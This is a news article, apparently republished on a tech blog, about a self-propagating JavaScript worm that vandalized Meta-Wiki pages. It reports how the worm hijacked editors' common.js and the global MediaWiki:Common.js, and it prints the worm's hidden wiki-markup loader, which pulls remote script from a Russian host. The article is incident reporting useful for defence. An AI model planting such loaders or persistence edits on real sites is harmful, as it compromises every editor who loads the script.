Close Menu
    Facebook X (Twitter) Instagram
    Wifi PortalWifi Portal
    • Blogging
    • SEO & Digital Marketing
    • WiFi / Internet & Networking
    • Cybersecurity
    • Tech Tools & Mobile / Apps
    • Privacy & Online Earning
    Facebook X (Twitter) Instagram
    Wifi PortalWifi Portal
    Home»Cybersecurity»Wikipedia hit by self-propagating JavaScript worm that vandalized pages
    Cybersecurity

    Wikipedia hit by self-propagating JavaScript worm that vandalized pages

    adminBy adminMarch 8, 2026No Comments4 Mins Read
    Facebook Twitter LinkedIn Telegram Pinterest Tumblr Reddit WhatsApp Email
    Wikipedia
    Share
    Facebook Twitter LinkedIn Pinterest Email

    Wikipedia

    Update: Added Wikimedia Foundation’s statement below and made a correction to denote it was only the Meta-Wiki that was vandalized.

    The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began modifying user scripts and vandalizing Meta-Wiki pages.

    Editors first reported the incident on Wikipedia’s Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages.

    Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.

    The JavaScript worm

    According to Wikimedia’s Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code.

    The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects.

    Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account.

    BleepingComputer’s review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user’s common.js and Wikipedia’s global MediaWiki:Common.js, which is used by everyone.

    MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:/common.js, which are executed in editors’ browsers to customize the wiki interface.

    After the initial test.js script was loaded in a logged-in editor’s browser, it attempted to modify two scripts using that editor’s session and privileges:

    • User-level persistence: it tried to overwrite User:/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
    • Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.
    Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
    Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
    Source: BleepingComputer

    If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.

    A Wikimedia user's infected common.js script
    A Wikimedia user’s infected common.js script
    Source: BleepingComputer

    The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.

    
    [[File:Woodpecker10.jpg|5000px]]
    
    [[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
    

    According to BleepingComputer’s analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.

    Pages modified by JavaScript worm
    Pages modified by JavaScript worm
    Source: BleepingComputer

    As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts.

    During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been “supressed” and are no longer visible in the change histories.

    At the time of writing, the injected code has been removed, and editing is once again possible.

    However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.

    Update 3/5/26 7:45 PM ET: The Wikimedia Foundation shared the following statement with BleepingComputer, stating that the code was active for only 23 minutes, during which it only changed and deleted content on Meta-Wiki, which has since been restored.

    “Earlier today, Wikimedia Foundation staff were conducting a security review of user-authored code on Wikipedia. During that review, we activated dormant code that was then quickly identified to be malicious. As a preventative measure, we temporarily disabled editing on Wikipedia and other Wikimedia projects while we removed the malicious code and confirmed the website was safe for user activity. The security issue behind this disruption has now been resolved.

    The code was active for a 23 minute period. During that time, it changed and deleted content on Meta-Wiki – which is now being restored – but it did not cause permanent damage. We have no evidence that Wikipedia was under attack, or that personal information was breached as part of this incident. We are developing additional security measures to minimize the risk of this kind of incident happening again. Updates continue to be made available via the Foundation’s public incident log.” 


    tines

    Malware is getting smarter. The Red Report 2026 reveals how new threats use math to detect sandboxes and hide in plain sight.

    Download our analysis of 1.1 million malicious samples to uncover the top 10 techniques and see if your security stack is blinded.

    hit JavaScript pages selfpropagating vandalized Wikipedia worm
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Telegram Email
    Previous ArticleAI agents: Powering Europe’s most ambitious startups
    Next Article The Samsung Galaxy S26 series is here, so which device are you interested in buying?
    admin
    • Website

    Related Posts

    A Webinar Guide to Auditing Modern Agentic Workflows

    March 10, 2026

    Armadin secures $189.9 million to counter AI-driven cyber threats

    March 10, 2026

    APT28 hackers deploy customized variant of Covenant open-source tool

    March 10, 2026
    Add A Comment
    Leave A Reply Cancel Reply

    Search Blog
    About
    About

    At WifiPortal.tech, we share simple, easy-to-follow guides on cybersecurity, online privacy, and digital opportunities. Our goal is to help everyday users browse safely, protect personal data, and explore smart ways to earn online. Whether you’re new to the digital world or looking to strengthen your online knowledge, our content is here to keep you informed and secure.

    Trending Blogs

    Why SEO now requires distribution

    March 10, 2026

    Google Gemini on Wear OS picks up a revamped weather card

    March 10, 2026

    Cisco blends Splunk analytics, security with core data center management

    March 10, 2026

    A Webinar Guide to Auditing Modern Agentic Workflows

    March 10, 2026
    Categories
    • Blogging (36)
    • Cybersecurity (696)
    • Privacy & Online Earning (97)
    • SEO & Digital Marketing (433)
    • Tech Tools & Mobile / Apps (862)
    • WiFi / Internet & Networking (115)

    Subscribe to Updates

    Stay updated with the latest tips on cybersecurity, online privacy, and digital opportunities straight to your inbox.

    WifiPortal.tech is a blogging platform focused on cybersecurity, online privacy, and digital opportunities. We share easy-to-follow guides, tips, and resources to help you stay safe online and explore new ways of working in the digital world.

    Our Picks

    Why SEO now requires distribution

    March 10, 2026

    Google Gemini on Wear OS picks up a revamped weather card

    March 10, 2026

    Cisco blends Splunk analytics, security with core data center management

    March 10, 2026
    Most Popular
    • Why SEO now requires distribution
    • Google Gemini on Wear OS picks up a revamped weather card
    • Cisco blends Splunk analytics, security with core data center management
    • A Webinar Guide to Auditing Modern Agentic Workflows
    • How to Analyze & Compare Competitor Website Traffic in 2026
    • ANBERNIC reveals full spec sheet for PlayStation Vita clones
    • Armadin secures $189.9 million to counter AI-driven cyber threats
    • How I Use My iPhone’s Focus Modes to Stop Getting Distracted at the Gym
    © 2026 WifiPortal.tech. Designed by WifiPortal.tech.
    • Home
    • About Us
    • Contact Us
    • Privacy Policy
    • Terms and Conditions
    • Disclaimer

    Type above and press Enter to search. Press Esc to cancel.